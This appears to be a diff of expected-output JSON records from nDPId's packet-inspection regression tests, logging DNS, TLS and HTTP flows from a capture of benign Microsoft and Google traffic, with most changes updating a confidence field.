00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIwDAAAEAR6EPAqAF5CAgICNkaADUANI8rXZMBAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAE="} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1626168077604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168077604,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJH8AAEARg\/XAqAF5CAgICNUhADUANLCIQG8BAAABAAAAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAE="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077604,"flow_last_seen":1626168077604,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168077604,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168077506,"flow_last_seen":1626168077607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168077607,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1626168077619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1626168077619,"pkt":"8BiYFWV8WNVuaKQACABFAACITIkAAHkRIqsICAgIwKgBeQA12RoAdB3yXZOBgAABAAAAAQAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAHAEwAGAAEAAAKpADQGbjBkc2NiwBgKaG9zdG1hc3RlcgZha2FtYWkDY29tAGDtWc8AAAPoAAAD6AAAA+gAAAcI"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077620,"flow_last_seen":1626168077620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077620,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1626168077620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077620,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KYAFDHEa2yAAAAALAC\/\/\/SXgAAAgQFtAEDAwYBAQgKPdH4\/AAAAAAEAgAA"} 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1626168077622,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1626168077622,"pkt":"8BiYFWV8WNVuaKQACABFAADmBoMAAHgRaVMICAgIwKgBeQA14zEA0sNDCy+BgAABAAQAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAosACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAyUANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAMDABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKEAAQABAAAAEwAEAhYh6w=="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077632,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pgVbXIGxxGts6AS\/oilegAAAgQFtAQCCAqgBBfWPdH4\/AEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077632,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KYAFDHEa2zFW1yB4AQCArKugAAAQEICj3R+QegBBfW"} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1626168077633,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1626168077633,"pkt":"8BiYFWV8WNVuaKQACABFAABYGXsAAHgRVukICAgIwKgBeQA11SEAREvAQG+BgAABAAEAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAHADAABAAEAAAATAAQCFiHr"} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} +00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077660,"flow_last_seen":1626168077660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077660,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1626168077660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077660,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KZAFBWi1SkAAAAALAC\/\/+bzgAAAgQFtAEDAwYBAQgKPdH5IAAAAAAEAgAA"} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1626168077670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077670,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pnFRlw1VotUpaAS\/ohpIwAAAgQFtAQCCAqAXqM6PdH5IAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1626168077670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077670,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KZAFBWi1SlxUZcNoAQCAqOZAAAAQEICj3R+SqAXqM6"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} -01001{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} +00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} +01001{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077734,"flow_last_seen":1626168077734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168077734,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 